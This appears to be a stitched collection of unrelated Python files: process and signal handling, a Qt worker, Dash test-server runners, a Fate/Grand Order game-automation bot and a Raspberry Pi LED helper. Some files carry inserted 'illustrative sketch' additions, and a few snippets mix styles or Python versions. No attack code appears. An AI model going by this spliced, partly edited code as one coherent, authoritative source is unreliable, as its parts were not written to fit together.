raise ValueError("'%s' must be a callable" % name)
def _bootstrap_process(target, *args, **kwargs):
if "fds_to_close" in kwargs:
for fd in kwargs["fds_to_close"]:
os.close(fd)
del kwargs["fds_to_close"]
target(*args, **kwargs)
def spawn_process(*args, **kwargs):
p = multiprocessing.Process(target=_bootstrap_process,
args=args, kwargs=kwargs)
p.start()
return p
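# Illustrative sketch (not part of the original module): "fds_to_close" is
# consumed by _bootstrap_process above, letting the child drop the pipe end
# that only the parent should keep. Assumes a fork start method (POSIX), where
# file descriptors are inherited; _demo_child is a hypothetical worker target.
def _demo_child(write_fd):
    os.write(write_fd, b"ready")
    os.close(write_fd)

def _example_spawn_process():
    r, w = os.pipe()
    p = spawn_process(_demo_child, w, fds_to_close=[r])  # child closes r first
    msg = os.read(r, 4096)  # parent blocks until the child writes
    os.close(r)
    p.join()
    return msg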
try:
from setproctitle import setproctitle
except ImportError:
def setproctitle(*args, **kwargs):
pass
def get_process_name():
return os.path.basename(sys.argv[0])
def run_hooks(name, hooks, *args, **kwargs):
try:
for hook in hooks:
hook(*args, **kwargs)
except Exception:
LOG.exception("Exception raised during %s hooks" % name)
@contextlib.contextmanager
def exit_on_exception():
try:
yield
except SystemExit as exc:
os._exit(exc.code)
except BaseException:
LOG.exception('Unhandled exception')
os._exit(2)
if os.name == "posix":
SIGALRM = signal.SIGALRM
SIGHUP = signal.SIGHUP
SIGCHLD = signal.SIGCHLD
    SIGBREAK = None
else:
SIGALRM = SIGHUP = None
SIGCHLD = "fake sigchld"
SIGBREAK = signal.SIGBREAK
class SignalManager(object):
def __init__(self):
# Setup signal fd, this allows signal to behave correctly
if os.name == 'posix':
self.signal_pipe_r, self.signal_pipe_w = os.pipe()
self._set_nonblock(self.signal_pipe_r)
self._set_nonblock(self.signal_pipe_w)
signal.set_wakeup_fd(self.signal_pipe_w)
self._signals_received = collections.deque()
signal.signal(signal.SIGINT, signal.SIG_DFL)
if os.name == 'posix':
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
signal.signal(signal.SIGTERM, self._signal_catcher)
signal.signal(signal.SIGALRM, self._signal_catcher)
signal.signal(signal.SIGHUP, self._signal_catcher)
else:
            # currently a noop on windows...
            signal.signal(signal.SIGTERM, self._signal_catcher)
            # FIXME(sileht): we should allow catching CTRL_BREAK_EVENT, but
            # the child process must be created with CREATE_NEW_PROCESS_GROUP
            # for that to work, so currently this is a noop, to be fixed later
            signal.signal(signal.SIGBREAK, self._signal_catcher)
@staticmethod
def _set_nonblock(fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def _signal_catcher(self, sig, frame):
# NOTE(sileht): This is useful only for python < 3.5
# in python >= 3.5 we could read the signal number
# from the wakeup_fd pipe
if sig in (SIGALRM, signal.SIGTERM):
self._signals_received.appendleft(sig)
else:
self._signals_received.append(sig)
def _wait_forever(self):
# Wait forever
while True:
# Check if signals have been received
if os.name == "posix":
self._empty_signal_pipe()
self._run_signal_handlers()
if os.name == "posix":
# NOTE(sileht): we cannot use threading.Event().wait(),
# threading.Thread().join(), or time.sleep() because signals
# can be missed when received by non-main threads
# (https://bugs.python.org/issue5315)
# So we use select.select() alone, we will receive EINTR or
# will read data from signal_r when signal is emitted and
# cpython calls PyErr_CheckSignals() to run signals handlers
# That looks perfect to ensure handlers are run and run in the
# main thread
try:
select.select([self.signal_pipe_r], [], [])
except select.error as e:
if e.args[0] != errno.EINTR:
raise
else:
# NOTE(sileht): here we do only best effort
# and wake the loop periodically, set_wakeup_fd
# doesn't work on non posix platform so
                # 1 second has been picked with the advice of a dice.
time.sleep(1)
# NOTE(sileht): We emulate SIGCHLD, _service_manager
# will just check often for dead child
self._signals_received.append(SIGCHLD)
def _empty_signal_pipe(self):
try:
            while len(os.read(self.signal_pipe_r, 4096)) == 4096:
pass
except (IOError, OSError):
pass
def _run_signal_handlers(self):
while True:
try:
sig = self._signals_received.popleft()
except IndexError:
return
self._on_signal_received(sig)
def _on_signal_received(self, sig):
pass
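# Illustrative sketch (not part of the original module): a minimal consumer of
# SignalManager reacts to signals by overriding the _on_signal_received hook.
class _DemoSignalManager(SignalManager):
    def _on_signal_received(self, sig):
        if sig == signal.SIGTERM:
            LOG.info("%s received, exiting", signal_to_name(sig))
            os._exit(0)
        elif sig == SIGHUP:
            LOG.info("%s received, reloading configuration", signal_to_name(sig))

# Usage: _DemoSignalManager()._wait_forever()  # blocks, dispatching handlers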
|
Params.py
|
import sys
import threading
import time
from polyaxon_client.tracking import Experiment
from params import param_utils
import params.polyaxon_parsing as pp
from util.output_artifact_utils import define_prepare_mdl_path, \
define_prepare_tb_path
def get_file_inputs():
while True:
try:
sys.argv.append(input())
except EOFError:
break
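# Illustrative note (not part of the original file): get_file_inputs() drains
# stdin into sys.argv, so parameters can be piped in rather than typed, e.g.
#   echo "--learning_rate=0.01" | python train.py
# appends "--learning_rate=0.01" as if it had been a command-line argument
# (script name and flag are hypothetical).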
class Params:
"""
Description
----
This enables the code to use the polyaxon
"""
# This is to load the params from a file
input_thread = threading.Thread(target=get_file_inputs, args=(), daemon=True)
input_thread.start()
print("Fetching inputs", end=" ... -> ")
time.sleep(10)
print("done.")
temporal_context = 0
last_interval = None
# polyaxon params
experiment = Experiment()
plx = pp.get_parameters()
param_utils.set_params(plx)
param_utils.check_params(plx)
# output paths
file_path_mdl = define_prepare_mdl_path(plx)
logdir_tb = define_prepare_tb_path()
|
qt_worker.py
|
from pyqtgraph.Qt import QtCore, QtGui
import traceback
import sys
from multiprocessing import Process, Pool, Queue, Pipe
import time
class WorkerSignals(QtCore.QObject):
'''
Defines the signals available from a running worker thread.
Supported signals are:
finished
No data
error
`tuple` (exctype, value, traceback.format_exc() )
result
`object` data returned from processing, anything
progress
`int` indicating % progress
'''
finished = QtCore.pyqtSignal()
error = QtCore.pyqtSignal(tuple)
result = QtCore.pyqtSignal(object)
progress = QtCore.pyqtSignal(int)
class Worker(QtCore.QRunnable):
'''
Worker thread
    Inherits from QRunnable to handle worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function
'''
def __init__(self, fn, *args, progress_fn=None, useMultiProcessing=False, verbose=False, **kwargs):
super().__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.useMultiProcessing = useMultiProcessing
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
self.verbose = verbose
self.progress_fn = progress_fn
process_pipe, main_pipe = Pipe()
self.receiver = main_pipe
self.sender = process_pipe
# Add the callback to our kwargs
# self.kwargs['progress_callback'] = self.signals.progress
def progress_update(self, queue, progress):
# queue.put(progress)
# get_progress(queue)
# self.signals.progress.emit(progress)
if self.progress_fn is not None:
self.progress_fn(progress)
@QtCore.pyqtSlot()
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
time_begin = time.time()
if self.verbose:
print('Starting process...')
# Retrieve args/kwargs here; and fire processing using them
try:
queue = Queue()
if self.useMultiProcessing is False:
# Only use threading, without using multiprocessing.Process
result = self.fn(*self.args, queue, self.sender, **self.kwargs)
# result = queue.get()
else:
# Process using multiprocessing.Pool
# This interface is consistent with threading, but progress cannot be communicated.
# Hence below approach using multiprocessing.Process and Queue is used.
# p = Pool(processes=1)
# results = p.map(self.fn, [*self.args])
# result = results[0]
# p.close()
                # The function input has 2 additional arguments (Queue and callback function).
                # This interface is not straightforward and needs to be fixed later.
p = Process(target=self.fn, args=[*self.args, queue, self.sender], kwargs=self.kwargs, daemon=True)
p.start()
                while queue.empty():
                    try:
                        # progress = self.receiver.poll(timeout=None)
                        progress = None
                        while self.receiver.poll():
                            progress = self.receiver.recv()
                    except EOFError:
                        break
                    else:
                        if progress is not None:  # guard: emit only real progress values
                            self.signals.progress.emit(progress)
result = queue.get()
p.join()
except:
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
if self.verbose:
print('Process finished!! Time elapsed = ' + ('%.3f' %(time.time()-time_begin)) + ' sec')
finally:
self.signals.finished.emit() # Done
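# Illustrative usage sketch (not part of the original module). _demo_task is a
# hypothetical workload following the (args..., queue, sender) convention used
# by Worker.run(): % progress goes through the Pipe, the result through the
# Queue. Assumes a Qt event loop is running so queued signals are delivered,
# and a platform where the module-level target is picklable.
def _demo_task(n, queue, sender):
    total = 0
    for i in range(n):
        total += i
        sender.send(int(100 * (i + 1) / n))  # % progress, polled by run()
    queue.put(total)  # final result, fetched by queue.get() in run()

def _demo_run_worker():
    worker = Worker(_demo_task, 100, useMultiProcessing=True)
    worker.signals.progress.connect(lambda p: print('progress:', p))
    worker.signals.result.connect(lambda r: print('result:', r))
    QtCore.QThreadPool.globalInstance().start(worker)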
# Alternative implementation. Unfinished.
# class SimpleThread(QtCore.QThread):
# finished = QtCore.pyqtSignal(object)
# def __init__(self, queue, callback, parent=None):
# QtCore.QThread.__init__(self, parent)
# self.queue = queue
# self.finished.connect(callback)
# def run(self):
# while True:
# arg = self.queue.get()
# if arg is None: # None means exit
# print("Shutting down")
# return
# self.fun(arg)
# def fun(self, sim):
# print('Running ' + str(sim.sim_time))
# log = sim.run()
# print('Finished ' + str(sim.sim_time))
# self.finished.emit(log)
|
application_runners.py
|
from __future__ import print_function
import sys
import os
import uuid
import shlex
import threading
import shutil
import subprocess
import logging
import inspect
import runpy
import future.utils as utils
import flask
import requests
from dash.testing.errors import (
NoAppFoundError,
TestingTimeoutError,
ServerCloseError,
)
import dash.testing.wait as wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""Import a dash application from a module. The import path is in dot
notation to the module. The variable named app will be returned.
:Example:
>>> app = import_app("my_app.app")
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
)
return app
class BaseDashRunner(object):
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
self._tmp_app_path = None
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(
self.stop_timeout
)
)
@property
def url(self):
"""The default server url."""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
@property
def tmp_app_path(self):
return self._tmp_app_path
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread.
This is the default flavor to use in dash integration tests.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ThreadedRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ,C0330
def start(self, app, **kwargs):
"""Start the app server in threading flavor."""
app.server.add_url_rule(
self.stop_route, self.stop_route, self._stop_server
)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
        try:
            self.thread.start()
        except RuntimeError:  # multiple calls on the same thread
            logger.exception("threaded server failed to start")
            self.started = False
            return
        self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
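# Illustrative sketch (assumed minimal dash app): the runner doubles as a
# context manager, so the server is stopped automatically on block exit.
def _example_threaded_runner():
    import dash
    import dash_html_components as html  # "from dash import html" on newer dash

    app = dash.Dash(__name__)
    app.layout = html.Div("hello")
    with ThreadedRunner() as runner:
        runner.start(app, port=8050)
        assert runner.accessible(runner.url)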
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess.
This flavor is closer to production environment but slower.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ProcessRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(
self,
app_module=None,
application_name="app",
raw_command=None,
port=8050,
start_timeout=3,
):
"""Start the server with waitress-serve in process flavor."""
        if not (app_module or raw_command):  # need to set at least one
logging.error(
"the process runner needs to start with"
" at least one valid command"
)
return
self.port = port
args = shlex.split(
raw_command
if raw_command
else "waitress-serve --listen=0.0.0.0:{} {}:{}.server".format(
port, app_module, application_name
),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(
lambda: self.accessible(self.url), timeout=start_timeout
)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
self.stop()
return
self.started = True
def stop(self):
if self.proc:
try:
self.proc.terminate()
if utils.PY3:
# pylint:disable=no-member
_except = subprocess.TimeoutExpired
# pylint: disable=unexpected-keyword-arg
self.proc.communicate(timeout=self.stop_timeout)
else:
_except = OSError
self.proc.communicate()
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super(RRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=2, cwd=None):
"""Start the server with subprocess and Rscript."""
# app is a R string chunk
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("RRunner inferred cwd from app path: %s", cwd)
else:
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"),
uuid.uuid4().hex,
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception(
"cannot make temporary folder %s", self.tmp_app_path
)
path = os.path.join(self.tmp_app_path, "app.R")
logger.info("RRunner start => app is R code chunk")
logger.info("make a temporary R file for execution => %s", path)
logger.debug("content of the dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info(
"RRunner inferred cwd from the Python call stack: %s", cwd
)
else:
logger.warning(
"RRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashr.run_server(app, cwd=os.path.dirname(__file__))"
)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
# note that the R assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__")
and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(
self.tmp_app_path, os.path.basename(asset)
)
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript -e 'source(\"{}\")'".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(
lambda: self.accessible(self.url), timeout=start_timeout
)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
fgoFunc.py
|
# Stars Cosmos Gods Animus Antrum Unbirth Anima Animusphere
# 星の形.宙の形.神の形.我の形.天体は空洞なり.空洞は虚空なり.虚空には神ありき.
# 地を照らし,空に在り,天上の座標を示せ.
# カルディアの灯よ.
# どうか今一度,旅人の標とならん事を.
# ここで,Bgo運営の敗北を宣言する!
# . OO---O---O-o\
# . // \ / \ / \ \\
# . OO O O O \\
# . // \ \ / / \ \\
# . oO---O---O---O---O-Oo
# . \\ / / \ \ / //
# . \O O O O //
# . \\ / \ / \ / //
# . oO---O---Oo-O
# . ^^
# . Grand Order/Anima Animusphere
# . 冠位指定/人理保障天球
'Full-automatic FGO Script'
__author__='hgjazhgj'
__version__='v7.9.2'
import logging,re,time,numpy
from threading import Thread
from itertools import permutations
from fgoAndroid import Android
from fgoCheck import Check
from fgoControl import control,ScriptTerminate
from fgoFuse import fuse
from fgoImageListener import ImageListener
from fgoLogging import getLogger,logit
logger=getLogger('Func')
friendImg=ImageListener('fgoImage/friend/')
mailImg=ImageListener('fgoImage/mail/')
class Device(Android):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
Check.device=self
device=Device()
def guardian():
prev=None
while True:
if Check.cache is not prev and Check.cache.isNetworkError():
logger.warning('Reconnecting')
device.press('K')
prev=Check.cache
time.sleep(3)
Thread(target=guardian,daemon=True,name='Guardian').start()
def gacha():
while fuse.value<30:
if Check().isGacha():device.perform('MK',(200,2700))
device.press('\xBB')
def jackpot():
while fuse.value<50:
if Check().isNextJackpot():device.perform('\xDCKJ',(600,2400,500))
for _ in range(40):device.press('2')
def mailFiltering():
if not mailImg.flush():return
Check().setupMailDone()
while True:
while any((pos:=Check.cache.find(i[1],threshold=.016))and(device.touch(pos),True)[-1]for i in mailImg.items()):
while not Check().isMailDone():pass
device.swipe((400,900,400,300))
if Check().isMailListEnd():break
class Battle:
skillInfo=[[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]]]
houguInfo=[[1,7],[1,7],[1,7],[1,7],[1,7],[1,7]]
masterSkill=[[0,0,0,7],[0,0,0,7],[0,0,0,0,7]]
def __init__(self):
Battle.friendInfo=[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]]
self.turn=0
self.stage=0
self.stageTurn=0
self.servant=[0,1,2]
self.orderChange=[0,1,2,3,4,5]
self.masterSkillReady=[True,True,True]
self.specialDrop=False
def __call__(self):
while True:
if Check(0,.3).isTurnBegin():
self.turn+=1
self.stage,self.stageTurn=[t:=Check(.2).getStage(),1+self.stageTurn*(self.stage==t)]
self.friend=Check.cache.isServantFriend()
Check.cache.getHP(),Check.cache.getNP()
if self.turn==1:
Check.cache.setupServantDead(self.friend)
self.stageTotal=Check.cache.getStageTotal()
else:self.servant=(lambda m,p:[m+p.index(i)+1 if i in p else self.servant[i]for i in range(3)])(max(self.servant),(lambda dead:[i for i in range(3)if self.servant[i]<6 and dead[i]])(Check.cache.isServantDead(self.friend)))
logger.info(f'Turn {self.turn} Stage {self.stage} StageTurn {self.stageTurn} {self.servant}')
if self.stageTurn==1:device.perform('\x67\x68\x69'[numpy.argmax(Check.cache.getEnemyHP())]+'\xBB',(800,500))
while(s:=(lambda skill:[(self.getSkillInfo(i,j,3),0,(i,j))for i in range(3)if self.servant[i]<6 for j in range(3)if skill[i][j]and(t:=self.getSkillInfo(i,j,0))and min(t,self.stageTotal)<<8|self.getSkillInfo(i,j,1)<=self.stage<<8|self.stageTurn])(Check.cache.isSkillReady())+[(self.masterSkill[i][-1],1,i)for i in range(3)if self.masterSkillReady[i]and self.stage==min(self.masterSkill[i][0],self.stageTotal)and self.stageTurn==self.masterSkill[i][1]]):
_,cast,arg=min(s,key=lambda x:x[0])
if cast==0:
device.perform(('ASD','FGH','JKL')[arg[0]][arg[1]],(300,))
if t:=self.getSkillInfo(*arg,2):device.perform('234'[t-1],(300,))
elif cast==1:
self.masterSkillReady[arg]=False
device.perform('Q'+'WER'[arg],(300,300))
if self.masterSkill[arg][2]:
if arg==2 and self.masterSkill[2][3]:
if self.masterSkill[2][2]-1 not in self.servant or self.masterSkill[2][3]-1 in self.servant:
device.perform('\xBB',(300,))
continue
p=self.servant.index(self.masterSkill[2][2]-1)
device.perform(('TYUIOP'[p],'TYUIOP'[self.masterSkill[2][3]-max(self.servant)+1],'Z'),(300,300,2600))
self.orderChange[self.masterSkill[2][2]-1],self.orderChange[self.masterSkill[2][3]-1]=self.orderChange[self.masterSkill[2][3]-1],self.orderChange[self.masterSkill[2][2]-1]
control.sleep(2.3)
while not Check().isTurnBegin():pass
self.friend=Check(.5).isServantFriend()
Check.cache.setupServantDead(self.friend)
continue
device.perform('234'[self.masterSkill[arg][2]-1],(300,))
control.sleep(2.3)
while not Check().isTurnBegin():pass
Check(.5)
device.perform(' ',(2100,))
device.perform(self.selectCard(),(270,270,2270,1270,6000))
elif Check.cache.isSpecialDropSuspended():
control.checkSpecialDrop()
logger.warning('Special drop')
Check.cache.save('fgoLogs/SpecialDrop')
device.press('\x67')
elif not self.specialDrop and Check.cache.isSpecialDropRainbowBox():self.specialDrop=True
elif Check.cache.isBattleFinished():
logger.info('Battle Finished')
if self.specialDrop:
control.checkSpecialDrop()
logger.warning('Special drop')
Check.cache.save('fgoLogs/SpecialDrop')
return self.turn
elif Check.cache.isBattleDefeated():
logger.warning('Battle Defeated')
return 0
device.press('\xBB')
@logit(logger,logging.INFO)
def selectCard(self):return''.join((lambda hougu,sealed,color,resist,critical:['678'[i]for i in sorted((i for i in range(3)if hougu[i]),key=lambda x:self.getHouguInfo(x,1))]+['12345'[i]for i in sorted(range(5),key=(lambda x:-color[x]*resist[x]*(not sealed[x])*(1+critical[x])))]if any(hougu)else(lambda group:['12345'[i]for i in(lambda choice:choice+tuple({0,1,2,3,4}-set(choice)))(logger.debug('cardRank'+','.join((' 'if i%5 else'\n')+f'({j}, {k:5.2f})'for i,(j,k)in enumerate(sorted([(card,(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1)))for card in permutations(range(5),3)],key=lambda x:-x[1]))))or max(permutations(range(5),3),key=lambda card:(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1))))])(Check.cache.getCardGroup()))([self.servant[i]<6 and j and(t:=self.getHouguInfo(i,0))and self.stage>=min(t,self.stageTotal)for i,j in enumerate(Check().isHouguReady())],Check.cache.isCardSealed(),Check.cache.getCardColor(),Check.cache.getCardResist(),Check.cache.getCriticalRate()))
def getSkillInfo(self,pos,skill,arg):return self.friendInfo[0][skill][arg]if self.friend[pos]and self.friendInfo[0][skill][arg]>=0 else self.skillInfo[self.orderChange[self.servant[pos]]][skill][arg]
def getHouguInfo(self,pos,arg):return self.friendInfo[1][arg]if self.friend[pos]and self.friendInfo[1][arg]>=0 else self.houguInfo[self.orderChange[self.servant[pos]]][arg]
class Main:
teamIndex=0
def __init__(self,appleTotal=0,appleKind=0,battleClass=Battle):
self.appleTotal=appleTotal
self.appleKind=appleKind
self.battleClass=battleClass
self.appleCount=0
self.battleCount=0
def __call__(self):
while True:
self.battleFunc=self.battleClass()
while True:
if Check(.3,.3).isMainInterface():
device.press('8')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
while not Check().isBattleBegin():pass
if self.teamIndex and Check.cache.getTeamIndex()+1!=self.teamIndex:device.perform('\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79'[self.teamIndex-1]+' ',(1000,400))
device.perform(' M',(800,10000))
break
elif Check.cache.isBattleContinue():
device.press('L')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
control.sleep(6)
break
elif Check.cache.isTurnBegin():break
elif Check.cache.isAddFriend():device.perform('X',(300,))
elif Check.cache.isSpecialDropSuspended():device.perform('\x67',(300,))
device.press('\xBB')
self.battleCount+=1
logger.info(f'Battle {self.battleCount}')
if self.battleFunc():device.press(' ')
else:
control.checkDefeated()
device.perform('BIK',(500,500,500))
control.checkTerminateLater()
@logit(logger,logging.INFO)
def eatApple(self):
if self.appleCount==self.appleTotal:return device.press('Z')
self.appleCount+=1
device.perform('W4K8'[self.appleKind]+'L',(400,1200))
return self.appleCount
@logit(logger,logging.INFO)
def chooseFriend(self):
refresh=False
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
if refresh:control.sleep(10)
device.perform('\xBAK',(500,1000))
refresh=True
if not friendImg.flush():return device.press('8')
while True:
timer=time.time()
while True:
for i in(i for i,j in friendImg.items()if(lambda pos:pos and(device.touch(pos),True)[-1])(Check.cache.find(j))):
Battle.friendInfo=(lambda r:(lambda p:([[-1 if p[i*4+j]=='x'else int(p[i*4+j])for j in range(4)]for i in range(3)]+[-1 if p[i+12]=='x'else int(p[i+12])for i in range(2)]))(r.group())if r else[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]])(re.search('[0-9xX]{14}$',i)if i else None)
return i
if Check.cache.isFriendListEnd():break
device.swipe((800,900,800,300))
Check(.4)
if refresh:control.sleep(max(0,timer+10-time.time()))
device.perform('\xBAK',(500,1000))
refresh=True
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
control.sleep(10)
device.perform('\xBAK',(500,1000))
class UserScript:
def __call__(self):
while not Check(0,.3).isTurnBegin():device.press('\xBB')
# # BX WCBA 极地用迦勒底制服
# # A D F 2 G H 2 J 2 K L 2 Q E 2 _ 6 5 4
# device.perform('ADF2GH2J2KL2QE2 654',(3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,300,350,3000,2400,350,350,10000))
# # Hikari Nobu Kintoki wcba atorasu
# # Q E 2 A F 2 G H 2 J 2 K L 2 _ 6 5 4
# device.perform('QE2AF2GH2J2KL2 654',(300,350,3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,2400,350,350,10000))
device.perform('QE2',(300,350,3000))
return Battle()()
|
led_status.py
|
'''
Led Status
Handle the led status light
Author: Tawn Kramer
'''
import sys
import time
import threading
try:
    import RPi.GPIO as GPIO
except ImportError:
    print('no RPi.GPIO support')
    import gpio_stub as GPIO
import conf
def setup(pin=23):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(pin,GPIO.OUT)
def set_led(pin=23, on_off=True):
'''
takes a pin and a bool whether to turn led on or off
'''
if on_off:
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
def blink(pin=23, n_times=3, delay=1.0):
while n_times > 0:
set_led(pin, True)
time.sleep(delay)
set_led(pin, False)
time.sleep(delay)
n_times -= 1
def test():
pin = int(sys.argv[1])
print "using pin", pin
setup(pin)
blink(pin)
'''
This show_status is a timer that must be kept
positive to keep the status light blinking.
We fire the status light when we get images to record.
'''
show_status = 0.0
def blink_status_thread():
global show_status
setup(conf.status_pin)
while show_status > 0.0:
blink(conf.status_pin, n_times=1, delay=1.0)
show_status -= 2.0
def start_status_thread():
th = threading.Thread(target=blink_status_thread)
th.daemon = True
global show_status
show_status = 3.0
th.start()
def keep_status_alive():
global show_status
if show_status <= 0.0:
start_status_thread()
show_status = 3.0
def shutdown():
global show_status
if show_status > 0.0:
show_status = 0.0
time.sleep(2)
#make sure we leave the led off
set_led(conf.status_pin, False)
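'''
Illustrative usage sketch (not part of the original module): a hypothetical
capture loop calls keep_status_alive() for every recorded frame, so the light
blinks only while images are flowing, and the led is switched off on exit.
'''
def example_record_loop(get_frame, save_frame):
    try:
        while True:
            frame = get_frame()
            if frame is None:
                break
            save_frame(frame)
            keep_status_alive()
    finally:
        shutdown()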
if __name__ == "__main__":
test()
|
wiki_parser.py
|
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
